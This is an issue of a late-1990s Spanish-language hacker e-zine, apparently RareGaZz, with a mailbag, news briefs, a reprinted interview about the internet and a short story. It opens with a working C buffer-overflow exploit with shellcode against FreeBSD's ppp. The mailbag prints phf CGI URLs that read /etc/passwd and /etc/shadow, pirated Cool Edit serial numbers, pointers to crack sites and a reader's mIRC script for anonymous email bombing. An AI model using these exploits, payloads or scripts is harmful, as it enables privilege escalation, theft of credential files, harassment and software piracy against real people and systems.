/tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Este es un script que abusa de la vulnerabilidad de PPP en FreeBSD. Si no funciona en tu sistema modifica los numeros. #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } .:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:. Estos exploits fueron recopilados y pasados a mi por muchos amigos y compañeros de grupo. Ninguno de nosotros escribio estos programas y dependiendo del sistema las debidas correcciones al codigo deberan ser hechas. [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ <<::RareGaZz::>> Prueba de que existe vida inteligente en internet ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀ ▀▀ ▀▀▀▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀▀ ▀▀ ▀▀ ▀▀▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀▀ ▀▀ ▀▀▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀ ▀▀ ▀▀▀▀▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀ ▀▀▀▀ ▀▀▀▀▀ * Tu linea de comunicacion segura con el underground * Mail Boy: Raretrip Saludos aqui estamos de nuevo gracias por esperar. Para cuando lean esta seccion si no se brincaron ninguna otra ya tandran una idea de como estuvo este numero y espero que la espera haya valido la pena. En el numero pasado empezamos el proyecto HACKERZ que pretende crear grupos o celulas de hackers en distintas partes del globo terraqueo pero nunca me imagine que existieran tantas ciudades en el mundo...encontrar dos iguales es muy dificil asi que sigan mandando sus datos por que vale la pena. Sus datos no seran usados para dañarlos de hecho en cuanto ustedes nos lo soliciten podran ser removidos del proyecto. Por la seguridad de nuestros compañeros NO se aceptaran datos de las ciudades de España :( lo sentimos pero aun siguen las represalias en contra de los hackers españoles y no quisieramos que por nuestra culpa capturaran a otro. A todos los que se preocuparon por sus datos y direcciones email es necesario decirles que solamente yo tengo derecho a guardarlos en mi disco duro y en todo momento (hasta que llega otro dato) permanecen encriptados al igual que la lista de correo usando Blowfish 32 con una llave larga y se encuentra en la particion encriptada con Secure Drive de mi disco. Si algo me llegara a pasar -otra vez- no hay de que preocuparse sus datos no seran revelados asi como las direcciones en la lista de correo. Dios bendiga los algoritmos de encripcion :))) () () () () () () () () () () () () ()() () () () () () () () () () () () () NoTa: No estaria mal que en los proveedores que a veces ponen pusieran la direccion IP o el dominio aparte de telefono porque la verdad eso de hacer llamadas a ensenada, venezuela, etc. sale caro.:-) [ Ok. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Me gustaria ver si me aceptan y me ayuden a incorporarme a este mundo tan interesante. Soy novato y tengo mucho que aprender. [ La lista de RareGaZz no es club privado todos pueden entrar. Para participar solamente tienes que enviar tus sugerencias o textos y taran. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Necesito informacion de como interceptar un e-mail. Pueden brindarmela? Otra cosa, los numeros de registro del Cool 96 no me andan. Por que puede ser? Les agradezco su colaboracion. [ Para interceptar un mail (o muchos) nada mas necesitas tu propio servidor y configurarlo para que sirva de ruteador de email :) Ahora cuando pase por tu sistema puedes instalar un "filtro" que capture mensajes con palabras escogidas por ti. Los numeros de registro si no te funcionan no se por que pero aqui van otros: Cool edit v1.50 for Windows name/You! #/BMJZCPUX Cool edit v1.51 for Windows name/COOL MAN #/XJMINCLE CoolEdit +v1.51 for Windows name: The GuaRDiaN aNGeL s/n: BZFLNMAR CoolEdit +v1.51 Lite for Windows name: tHE riDDLER [uCF] s/n: ZPXSEWLF CoolEdit v1.52 Full for Windows name: tHE riDDLER [uCF] s/n: CMFRQENH P.D. Si quieres recibir respuesta mas rapida para la otra que mandes un mensaje usando remailers incluye una direccion email donde podamos contestar ;-) ] () () () () () () () () () () () () ()() () () () () () () () () () () () () [Gratismail es el peor servicio de email que existe!! Lo sentimos pero todos los mensajes que la lista mando para ese server rebotaron y no pudo llegar ninguno a su destino. Si su direccion que esta en nuestra lista es de ahi mil disculpas si no recibieron notificacion cuando aparecio el numero nuevo. Por ahi recomienda nuestro amigo Arkangel http://www.mailcity.com ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Queria pediros si tendrias algun crackeador para los juegos Indy3 y Loom. Muchas gracias. Jorge. [ Visita http://hack.box.sk -gracias extreme- y en la seccion de cracks o serials seguro encuentran lo que buscan. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Saludos amigos!! Soy de españa, y el otro dia encontre casi por casualidad vuestra revista. Estaba mirando por ahi, en los buscadores,y de pronto... anda! si existen revistas con temas de hacking por sudamerica!! :)) Dicho y hecho, cogi los numeros (en total habia 6, teneis mas :? ) y me los lei avidamente. Despues de haberlos leido, llege a la conclusion de que la revista era exactamente lo que esperaba; un nivel aceptable, con articulos facilones de entender (a veces demasiado faciles) y otras veces articulos con un nivel tecnico muy interesante. Por cierto... no se si lo tendreis, pero aqui va la direccion de la pagina oficial de #!hispahack: http://www.angelfire.com/hi/MentesInquietas () () () () () () () () () () () () ()() () () () () () () () () () () () () ¿puede un hacker afectar el sistema de un usario atravez de los chat java como el planetachat (chat venezolano)? gracias y sigan con su excelente revista que a todos nos sirve. Clark [ Java es seguro en ese aspecto. Por ahi existia un programa para hackear los chat rooms de geocities basados en frames. No recuerdo la direccion pero se que existen programas para hackear los chat rooms basados en frames es por eso que geocities ya tiene pocos o ningun chat room basado en frames. Si alguien sabe como hackear los chat rooms basados en java o tiene algun programa que lo haga ... podria enviarlo o decirnos donde encontrarlo? ] () () () () () () () () () () () () ()() () () () () () () () () () () () () quisiera saber mas sobre la etiqueta entre hackers. Porque tengo miedo que usen de sus habilidades para hacker mi IP, o algo parecido. No se hasta donde podrian llegar. ¿Existe el respeto entre hackers (aunque yo no sea uno)? Gracias por su contestacion. [ Nosotros no dañamos a ningun lector o miembro de nuestra lista de correo. Si alguien piensa que esto no es cierto envienos sus razones y las publicaremos y discutiremos en esta seccion. De que serviria hackear a los que nos escriben o consultan?? ¿ Por que hariamos daño a los lectores ? ¿Por que enseñariamos a hackear entonces? ] () () () () () () () () () () () () ()() () () () () () () () () () () () () En el numero 4 hablan de algunas personas molestandolos. ¿ que paso ? [ Muertos. Las direcciones de correo que usaban desaparecieron de la faz de i-net tambien las paginas web que tenian en spin y teesa fueron borradas por ellos mismos cuando misteriosamente se convirtieron en un mirror site de la pagina de raregazz :-) Los nicks de estas personas son: Eduardo Q. Gonzalez, Francisco Castro Ortiz y Gina D. Hasta el momento no hemos vuelto a tener problemas con ellos. ;-) ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Hay maneras de recargar las tarjetas ladatel ? si es asi me gustaria que me dijeran como. Ademas de que me gustaria saber como llamar gratuitamente en los telefonos de tarjetas. No se saben algun codigo ? [ Las tarjetas no se pueden recargar de ninguna forma no importa lo que digan otras personas. No, si las dejas al sol no se recargan. Tampoco se recargaran en el refrigerador ni con el martillo. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () No saben algo de un programa llamado PROGRESS de como crackearlo es muy importante. azumlord@hotmail.com () () () () () () () () () () () () ()() () () () () () () () () () () () () Hola!!! que onda! que haciendo me he ausentado un buen de la red por la pendejada de un servidor de mi ciudad que trae un conflicto con las paginas de hipertexto y nada mas se puede mediante TELNET y pues el que tengo es una vil cagada, ¿cual me recomiendas?, ahhh!!!! oye me pudes enviar una copia del INTERHAK pues he leido de el en la revista y pues se ve que esta fregon. bueno ya te dejo espero tu respuesta pronto. :-) BYE. [ Interhak va a estar disponible otra vez en el servidor de geocities lo puedes conseguir en nuestra pagina de software en "hacking" o haciendo click en este link: http://www.geocities.com/Baja/4426/interhak.zip Una copia del programa TELNET.EXE para Windows 95 que permite seleccionar el puerto al que quieres realizar una conexion esta en la pagina de software seccion internet. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () ojala pudieran decirme como ubicar informacion hacerca de la programacion de moviles celulares (NOKIA 104-105) , saludos... [ Si alguien por ahi sabe de la programacion de celulares ... ] () () () () () () () () () () () () ()() () () () () () () () () () () () () a toda madre carnal se pasaron con el anuncio a cuanto les salio ? christian [ Yo no lo he visto pero se que cuesta $65 pesos cada vez que sale en t.v. ] () () () () () () () () () () () () ()() () () () () () () () () () () () () AHORA LES MANDO UN TELEFONO QUE HE ENCONTRADO DE MI PROVEEDOR, QUE SOLO FUNCIONA EN SAN JOSE DEL CABO, BAJA CALIFORNIA SUR. EL TELEFONO ES 22883, ES EL UNICO QUE HE ENCONTRADO. [ Gracias por el numero! ¿ cual es la direccion IP ? ] () () () () () () () () () () () () ()() () () () () () () () () () () () () [ GuyBrush nos manda los defaults de IRIS que solicitamos el numero pasado! ] accounting boss demo manager pdp8 pdp11 software () () () () () () () () () () () () ()() () () () () () () () () () () () () Me podeis decir donde puedo encontrar buenos programas para nukear a gente en el IRC? () () () () () () () () () () () () ()() () () () () () () () () () () () () necesito urgentemente conseguir los programas kaboom3 y upyours3.zip que segun esto deverian de ser disponibles en la seccion de e-mail de raregazz, pero cada vez que trato de bajarlos me dice que no estan disponibles, y es de a neta que necesito un buenprograma para chingar passwords de e-mail, en especial de hotmail. urgente. [ Ya estan los links en la pagina funcionando, si alguno falla pueden avisarnos. Ahora, si quieres saber el password de una cuenta en hotmail va a estar kbron. Estan algo protegidos de personas con las mismas intenciones. Pero este bug *SERVIA* en hotmail para obtener el passwd, ahora ya no sirve por que pusieron shadow y arreglaron el bug. Para capturar el passwd http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd Para capturar el shadow http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/shadow ] () () () () () () () () () () () () ()() () () () () () () () () () () () () Hay una manera de mandar e-mails totalmente anonimo con el Mirc, y cuando me refiero a anonimos ME REFIERO A ANONIMOS, su unico defecto es que no puedes mandar mensajes muy largos por el buffer del Mirc pero ando tratando de corregir eso :) A continuacion adjunto los comandos para lograr mandar un e-mail anonimo: corten y copien esto en el aliases: ------------------------------------------------------------------ doclos { unset %mail.wi* | window -c @BoMBa De E-MaiL } mailb { %mail.* | if (%mail.me != $null) { close -c %mail.me } | killc window -doe @BoMBa De E-MaiL 173 169 312 111 fixedsys | .timer3434 1 80 doclos set %mail.win on .echo @BoMBa De E-MaiL ° N·mero de mails: } /bc { %r = $$1 $2 $3 $4 $5 | %l = $len(%r) | %nco = 1 | %bb = $chr(0160) | %bbc = $chr(44) | %bbs = $chr(3) | %bbo = $chr(15) | %bba = $chr(42) | %o = 1 | %o1 = 1 | %line = "" | :lop | if %o = 6 goto end | %o1 = 1 | %line = "" | :red | if %o1 > %l { /say %line | /inc %o | goto lop } | %lt = $mid(%o1,1,%r) | if %lt = $chr(32) set %lt sp | %rt = %lt $+ %o | %lin = $readini $mircdir $+ font.txt %lt %rt | %nco = %o1 | if %nco == 16 /set %nco 7 | %mgl = %bbs $+ %nco $+ %bbc $+ %nco $+ %bb $+ %bbo | %clin = $replace(%lin,%bba,%mgl) | if %lt = sp set %clin %lin | %line = %line %clin | /inc %o1 | goto red | :end } mail { inc %mailbomb msg = $+ %mail.me MAIL FROM:< $+ %mail.from $+ > msg = $+ %mail.me RCPT TO:< $+ %mail.to $+ > msg = $+ %mail.me DATA msg = $+ %mail.me Date: 23 Oct 81 11:22:33 msg = $+ %mail.me From: %mail.from msg = $+ %mail.me To: %mail.to msg = $+ %mail.me Subject: %mail.subject msg = $+ %mail.me %mail.txt msg = $+ %mail.me . echo = $+ %mail.me 4  %mailbomb  Mails enviados. if (%mailbomb >= %mail.bombs) { close -c %mail.me | .disable #mail | echo -a 4Fueron enviados  $+ %mailbomb $+  mails a %mail.to | unset %mail.* } .disable #mail } -------------------------------------------------------------------- Luego esto en el remote: -------------------------------------------------------------------- on 1:chat:*Message accepted for delivery:{ mail } #mail on on 1:chatopen:{ if ($nick = $me) { set %mailbomb 0 | msg = $+ $me helo } | set %mail.me $me } on 1:chat:*pleased to meet you:{ mail | inc %mail.bomb | .disable #mail } #mail end --------------------------------------------------------------------- Haaa!! Estas son bombas por e-mail, es muy bueno para bombardear ya que es bastante rapido, para ejecutar la funcion solo teclea /mailb y listo, en pantalla te pedira los datos. ATTE: CaZadOR () () () () () () () () () () () () ()() () () () () () () () () () () () () [ He visto muchos articulos sobre Internet en periodicos, revistas y en television pero la gran parte responden a interes economicos y unicamente contribuyen al gran hype sobre internet y a la sobrepoblacion de la red. Pero de vez en vez me encuentro con muy buenos articulos sobre la red que son escritos por personas que analizan objetivamente los recursos de internet. Esta vez dos escritores mexicanos contribuyen con sus articulos al poco material objetivo sobre internet que sobrevive en algunos paises del mundo. Disfruten. ] Gozosamente atrapados en la pegajosa telaraña de la red de Internet tejida en el ciberespacio por todas las manos del mundo, Victor Flores Olea y Rosa Elena Gaspar de Alba no se resistieron a la reflexion sobre su origen, su significado y su impacto, para bien o para mal, en un mundo tan complejo como el que habitamos. El resultado de sus dudas, de su curiosidad, de sus busquedas, de su necesidad de analisis y de interpretacion es el libro Internet y la revolucion cibernetica, editado por Oceano y que comenzo a circular el jueves pasado, luego de su presentacion formal la noche del jueves pasado en la Casa Lamm. Entre las muchas interrogantes que se formulan ahi el extitular del Consejo Nacional para la Cultura y las Artes y la arqueologa Gaspar de Alba, figuran las siguientes: -¿Internet podra ser un dia controlado por unas cuantas corporaciones enormes integradas verticalmente para a su vez controlar la produccion y la distribucion de la informacion? -¿En el desarrollo de Internet se limitara en el futuro la privacia, perdiendose la libertad de palabra y de expresion, convirtiendose estos valores unicamente en un recuerdo del pasado? -¿Internet ahondara las diferencias entre paises pobres y ricos, y aun entre pobres y ricos de un mismo pais, por el hecho de masivas desigualdades, mas pronunciadas que ahora, en el acceso a la informacion? -¿O bien, Internet contribuira a reducir esas diferencias y a difundir informacion entre quienes carecen de ella? -¿Internet propiciara una mayor responsabilidad de los gobiernos y una mayor actividad politica de la sociedad, beneficiando a la mayoria con nuevos estimulos educativos y con mayores beneficios economicos? De 140 paginas, el volumen "no es un manual", advierte Flores Olea en entrevista, aunque contiene una amplia seccion de "lexico cibernetico". Se trata, dice, de un libro de reflexiones sobre las consecuencias del Internet, sobre sus significados en lo politico, lo social, lo cultural: los pros y los contras. Y adelanta: "En los terminos de Walter Benjamin, Internet implica una democratizacion de la cultura." E interroga: ¿si?, ¿no?: la discusion esta ahi. En el origen, relata, Internet no era sino una estrategia de seguridad para el gobierno norteamericano, que preservaba informacion clasificada en un sistema descentralizado al modo de una telaraña, que no fuera destruible por acciones de guerra o por actos de sabotaje. Era, ilustra, como un hormiguero sin central. A pesar de su origen militar estrategico, Internet fue retomado luego por la investigaci≤n cientifica y cultural para entrelazar a los academicos, a las universidades. Mas tarde, se invento un protocolo de mayor amplitud, y el circulo selectivo de instituciones comenzo a crecer hasta el punto que se calcula que para el año 2000 la red habra de contar con unos 300 millones de usuarios en todo el mundo. De modo que Internet y la revolucion cibernetica surge basicamente de la experiencia de un par de usuarios, "sin mas pretensiones que la idea de reflexionar sobre cual es el medio en el que nos estamos metiendo, cuales son las implicaciones de tipo economico, cultural, politico y social que podria tener". Y señala Flores Olea: "Yo creo que Internet esta muy vinculado con el tema de la globalizacion, que de hecho es una de las formas de la globalizacion contemporanea, de la comunicacion planetaria, con las facilidades tecnicas, sencillas, que se tienen, con la difusion extraordinaria de las computadoras personales, y con el hecho de que con una llamada local se puede estar en contacto con cualquier sitio del mundo y obtener documentacion. Esto es de una importancia extraordinaria para la proliferacion de Internet." Para Flores Olea, asimismo, "la tecnologia `per se' es indiferente, pero depende de la estructura social y economica para la que se utilice". Explica entonces: "La television, a fin de cuentas, esta en manos del mercado, y todo su contenido esta marcado por esos intereses economicos que han invertido en ella, aunque hay paradojas, porque la competencia ha exigido que las cadenas de television informen sobre una cantidad de cosas de las que normalmente no tendrian por que informar, como las contradicciones de la sociedad, la miseria, las enfermedades en Africa." En este sentido, agrega, "una de las preguntas que nos hacemos es si Internet es un instrumento de esta globalizacion del capitalismo, o si tiene ademas otras consecuencias, y nosotros creemos que si esta dentro de la globalizacion del capitalismo; es decir, sin el desarrollo y las intercomunicaciones, y sin la necesidad de un mercado mundial como el que plantea hoy el capitalismo, probablemente no se habria desarrollado Internet". Asi, advierte, "las previsiones son que el mercado mundial sera el dia de mañana un mercado a traves de Internet; en Estados Unidos ya lo estan haciendo y nosotros estamos absolutamente atrasados". Los autores sostienen en su libro "que tal vez esto sea imparable, pero insistimos en que debe mantenerse tambien el aspecto cultural, creativo, de informacion de otra naturaleza y no puramente mercantil". [ En eso estamos! ] Observan, tambien, que "todo el aspecto social y politico que tiene Internet, por ejemplo la presencia de las organizaciones no gubernamentales en el mundo, es fundamental, y esto enlaza a las comisiones o grupos de derechos humanos en el mundo, los que luchan por los grupos etnicos, por el medio ambiente, por la mujer, la niñez; todo el mundo de objetivos sociales, que no son mercantiles, estan tambien presentes en Internet, entonces ahi coexisten las preocupaciones por problemas sociales universales y locales". Por ejemplo, dice, "una de las paginas mas actualizadas y que mas circulan en Internet es la del Ejercito Zapatista de Liberacion Nacional". Y analiza: "Tenemos una muestra muy clara de como la aldea local, incluso marginada, unos rebeldes confinados en una region de un pais, tienen una presencia en la red absolutamente abierta, como la tienen la General Motors o la Casa Blanca. Esta es una presencia que han logrado los zapatistas con un gran talento, y por eso han tenido tanto reflejo en Europa, Canada y Estados Unidos. Incluso, todos sus documentos estßn en un par de idiomas: ingles y frances. Asi, lo que ocurre en un rincon del mundo se convierte en un tema universal. Yo creo que este es de los aspectos mas positivos de Internet: la aldea global se hace universal y lo universal llega a las localidades." 1997 Derechos Reservados, Comunicacion e Informacion S.A. de C.V. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.proceso.com.mx () () () () () () () () () () () () ()() () () () () () () () () () () () () Hasta pronto! No se cuanto se tarde en salir el siguiente numero o quien lo ira a editar pero si se que estaremos esperando sus mensajes como siempre. Si alguno de ustedes no recibio aviso cuando aparecio este numero mil disculpas pero no todos los forms nos llegan asi que envia un mensaje por e-mail solicitando estar en la lista y se soluciona todo. " Cuando ser hacker se convierta en algo ilegal, solo los delincuentes seremos hackers. " [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Dinamita - El mejor exploit para estrellar un sistema. ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] << NotiLOONS >> By Groovy ` La informacion necesaria para vivir sanamente ' +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Internet: La nueva droga ======================== Un joven de 17 años enloquecio en un centro de rehabilitacion para alcoholicos. Su cuerpo temblaba y arrojaba sillas y mesas alrededor. Estaba sufriendo de abstencion, pero no de heroina, cocaina o alcohol...estaba sufriendo por falta de internet. En la costa oeste americana una mujer pasaba demasiado tiempo en el ciberespacio que su esposo tuvo que divorciarse. En ese tiempo la mujer se negaba a alimentar a sus hijos o llevarlos al doctor cuando ellos enfermaban. Fue el New York Times el que puso en el reflector por primera vez la adiccion a internet en USA. Hace apenas unos años, el abuso de internet no era conocido. Ahora mas y mas psicologos advierten sobre las consecuencias para las personas que no puedan regular el uso de internet. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Los casinos en internet estan a punto de ser ilegales en USA. Tambien jugar en ellos desde cualquier pais norteamericano sera ilegal si la propuesta es aceptada. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ El ultimo nuevo show de Beavis & Butthead es en septiembre 10 por MTV. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Microsoft anuncio el lanzamiento del diseñador mas vendido de paginas html Frontpage 98. Una version Beta esta disponible en: http://www.microsoft.com/frontpage/ +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Microsoft anuncio el lanzamiento oficial de Internet Explorer 4 para el 30 de septiembre. Netscape responde ofreciendo el Navigator 4.0 sin ningun componente en su website debido a un desacuerdo entre sus afiliados. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Varios Beta Testers junto con raretrip han sacado el nuevo programa SEND 2.1 que permite realizar comunicaciones por internet 100% seguras por email. Obviamente para el funcionamiento optimo del programa es recomendado contar con una copia de PGP para el DOS correctamente instalada pero el programa puede hacer mensajes anonimos sin necesidad de usar PGP. El cambio mas importante en esta version ha sido el manejo grafico de las opciones y asi como una interfaz intuitiva para el usuario. amazing! [ Poco antes de publicar este texto 18 (si asi es 18!) errores fueron encontrados en la version Beta que se empezo a distribuir hace poco. Por favor espera de una a dos semanas antes de bajar este programa en http://www.geocities.com/Baja/4426/remail.zip No te arrepentiras cuando lo veas funcionar correctamente ;-) ] +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ En Mexico se estan estudiando leyes contra los llamados "hackers" que se dice cuestan mucho dinero a las compañias afectadas. BBS y paginas web dentro del territorio mexicano seran cuidadosamente examinadas. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Pretty Good Software ha terminado la ultima version de su programa Pretty Good Privacy o PGP como comunmente se conoce. Esta version podra generar llaves de encripcion de hasta 4096bits usando el algoritmo de llaves publicas escrito por DSS/Diffie-Hellman que no es compatible con las versiones anteriores de PGP. Para poder usar el famoso algoritmo RSA es necesario un numero de licencia disponible mediante un pago o consiguiendo el numero serie en algun website de crackers. La recomendacion de Phillip Zimmermann el creador de PGP es generar una llave RSA de 2048bits usando el numero serie para solucionar problemas de compatibilidad con antiguas versiones. Otra recomendacion es generar una llave RSA usando alguna version internacional para DOS y despues usarla con esta nueva version para Windows 95. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Microsoft empieza a restar importancia a Windows 98, llamandolo una pequeña actualizacion. Se espera que este listo para el proximo Abril. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Un juez federal decidio que las restricciones de los Estados Unidos de Norteamerica respecto a la exportacion de software de encripcion son anticonstitucionales. El juez de distrito Marilyn Hall Patel decidio no permitir al gobierno estadounidense regular los algoritmos de encripcion ni someter a penas a las personas que discutan sus algoritmos con personas de otros paises. ¡ victoria ! Los algoritmos patentados como RSA necesitaran de una licencia para poder ser usados en piezas de software. Los cypherpunks del mundo entero estan felices con el resultado, por fin le han ganado al "gran hermano". Ahora solo hace falta educar a las masas sobre el uso de la encripcion dijo Zimmermann cuando fue entrevistado. +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+ Bigfoot International Inc. y McAfee Associates han lanzado un poderoso y centralizado sistema de proteccion de virus para el email. Con este nuevo sistema todos los mensajes que sean enviados a una direccion de bigfoot asi como los attachments seran revisados de virus automaticamente con una version siempre actualizada de VirusScan antes de entregarlos al dueño de la cuenta. Este servicio que aun esta en Beta Testing es uno de los mas innovadores hasta el momento. Desgraciadamente el otro lado de la moneda es que siguen las grandes compañias apoderandose del territorio de todos ... internet. El servicio estara disponible para todo el mundo GRATIS desde el primero de septiempre en www.bigfoot.com [ Si se deciden a enviarnos un virus a nuestra direccion codifiquenlo con PGP para que pueda pasar por este nuevo sistema. Otra alternativa es que manden el mensaje a raretrip@cyberdude.com para eviar que Bigfoot lo revise de virus :-) ] [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ RareGaZz - What a Gas! ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] P R O H I B I D O P E N S A R (cuento) Han pasado casi cuarenta años desde que se inicio la era de Tecno y con ella el retroceso del hombre de Humania. Cuarenta años que se puso en juego el futuro de sus generaciones; que sus instituciones fueron desquebrajadas. Del abatimiento de sus tradiciones por los efectos de la transculturacion; de esa gran invasion organizada en la que el consumo fue la clave de penetracion. La dependencia y el dominio le dieron forma a esta epoca de crisis donde los valores infrahumanos se preconizaron directa y subliminalmente, hasta alcanzar el reinado de los sentidos sobre la razon. Al principio nadie se dio cuenta. Eran la novedad, la moda. Unos cuantos tachados de locos fueron los que se opusieron a la invasion de Tecno. Aunque sutil en el principio, fue gradualmente efectiva al paso del tiempo. En este estado de cosas empieza nuestra historia. Sucedio en Adanes lugar apartado de las fronteras de Pragma, patria de Tecno. Aqui, la invasion no habia causado sus efectos totales. Nuestro personaje principal; un joven de dieciocho años dinamico y rebelde, llamado Cultus, quien ha descubierto en la naturaleza la esperanza que sus amigos siquiera imaginan. Victimas de la enagenacion programada, buscan en Cultus la liberacion y el reencuentro con la luz del saber. Reanudada la platica del dia anterior, Cultus mira fijamente a sus dos compañeros; mueve la cabeza en signo afirmativo y dice: -El tio Memo me cuenta, que cuando Tecno llego, a traves de las editoriales saboteo el derecho a la cultura; impuso precios criminales a los libros y alejo en tal forma, a la gente de Humania, de la lectura. Pronto establecio nuevas formas de control social por medio de la mediatizacion de la enseñanza, socavando los cimientos de nuestras culturas y tradiciones principalmente, por medio de su corriente transcultural; cuando pondero la violencia, la ganancia rapida y facil; el desprecio hacia la vida y la naturaleza. Asi sometio a nuestros hermanos a una existencia meramente sensorial. Sin rostro, casi hemos perdido nuestra identidad ideal, con su proyector de imagenes. Todo esto formo parte del mismo complot, el bloqueo de la comunicacion familiar, la enagenacion masiva... En sus acostumbradas interrupciones Albion exclamo enfatico: -Es cierto Cultus, el mundo se volvio loco y quiere lucir como cuerdo adorando a Tecno. -¿Quien esta cuerdo Cultus? dijo Zigo para desviar un poco la irrupcion de Albion -¿Estamos fuera de contexto? -¿Nuestra terquedad por buscar la verdad nos hace diferentes a los demas? -Nos buscamos y en este proceso nos encontramos solos, ¿unicamente para concluir que nos hemos alejado de los demas? -¿Este es el precio que tenemos que pagar para encontrarnos? (reflexionando brevemente) continuo: -No es facil ignorar el rechazo de los demas, ni reconocer que tienen la fuerza, pero no la razon. Sientes que a medida que te alejas de tu origen, el objetivo pierde cada vez mas sentido con lo que fuiste, con lo que fue tu identidad, tu numero, tu nombre; con lo que reclamas, con lo que no puedes mostrar, so pena de ser declarado loco o tecnodesadaptado. - Si Zigo. Acepto Cultus, asintiendo levemente con la cabeza. -No se puede acallar un eco gritandole que guarde silencio y la duda de la duda no es suficiente para asirse a la razon. 